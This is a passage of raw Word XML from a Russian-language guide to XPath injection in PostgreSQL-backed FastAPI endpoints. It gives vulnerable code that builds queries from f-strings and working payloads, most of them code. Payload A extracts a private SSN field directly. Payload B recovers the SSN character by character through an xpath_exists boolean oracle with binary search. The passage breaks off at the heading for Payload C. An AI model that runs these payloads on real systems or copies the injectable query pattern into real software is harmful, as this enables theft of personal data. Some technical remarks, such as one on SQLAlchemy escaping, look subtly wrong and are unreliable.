      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — массив XML-элементов; для text-результата чаще оборачивают в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>array_to_string(xpath(...)::text[], '')</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865F7E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — XPath injection для прямого извлечения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3D35F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: эндпоинт принимает XPath-выражение для извлечения значения из user-uploaded XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130D2C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/documents/{doc_id}/xpath")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69131261" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def query_doc(doc_id: int, xpath_expr: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB4F745" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT xpath('{xpath_expr}', xml_content) FROM documents WHERE id = :id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087ED85A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q, {"id": doc_id})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053EB6B6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F41891" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XML в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>documents.xml_content</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F5236" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1ABCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F888434" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;name&gt;Alice&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344A997" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;bio&gt;Developer&lt;/bio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2AD282" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA9819" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;private&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09CCE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ssn&gt;123-45-6789&lt;/ssn&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45058664" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;salary&gt;120000&lt;/salary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00017C14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;/private&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401C542" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F96572" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application ожидает: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath_expr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/user/public/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — публичные поля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5A068" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath_expr</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D76F08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/user/private/ssn/text()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB30B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17C546" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT xpath('/user/private/ssn/text()', xml_content) FROM documents WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7F980" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Результат: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{123-45-6789}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (XML-array из одного text-элемента). Application возвращает в HTTP-response — SSN утёк.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B92FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернативы для recon неизвестной структуры XML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2FEE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все элементы (рекурсивный спуск).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9BB96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//*/name()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — имена всех элементов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE30E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//*[name()='private']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все элементы с тегом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на любой глубине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636C55D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>count(//*)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — количество элементов (для гипотез о размере).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E6A83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — XPath blind через xpath_exists() как boolean-oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88E275" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: эндпоинт не возвращает результат xpath() напрямую, но валидирует существование через xpath_exists():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D646531" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/documents/{doc_id}/validate")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8AD59A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def validate(doc_id: int, xpath_expr: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3155C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT xpath_exists('{xpath_expr}', xml_content) FROM documents WHERE id = :id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB39AAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q, {"id": doc_id})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24414586" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"valid": result.scalar()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714F061" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атакующий получает boolean-oracle через подбор XPath-предикатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7956BD1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload для извлечения первого символа SSN (бинарный поиск):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1CF64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//ssn[starts-with(text(), '1')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9DD850" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B805C9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT xpath_exists('//ssn[starts-with(text(), ''1'')]', xml_content) FROM documents WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466DCDEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(SQLAlchemy escapes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для f-string в text() — это часть атаки, апостроф нужно экранировать вручную в payload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81BD3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Если SSN начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Иначе — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. HTTP-response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"valid": true/false}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75459337" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий перебирает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'0'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'9'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для цифр) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'a'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'z'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для текста), получая первый символ. Далее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>starts-with(text(), '12')</w:t>
      </w:r>
      <w:r>
        <w:t>, и т.д. — посимвольный leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D9EE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ускорение через бинарный поиск с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363558AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//ssn[substring(text(), 1, 1) &gt;= '5']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379812D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>— проверка «первый символ ≥ '5'». ASCII-comparison. log2(10) ≈ 3.3 query на цифру вместо 5 при линейном поиске.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60174660" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payload C — XPath с computed path через query_to_xml() для leak метаданных</w:t>
      </w:r>
    </w:p>
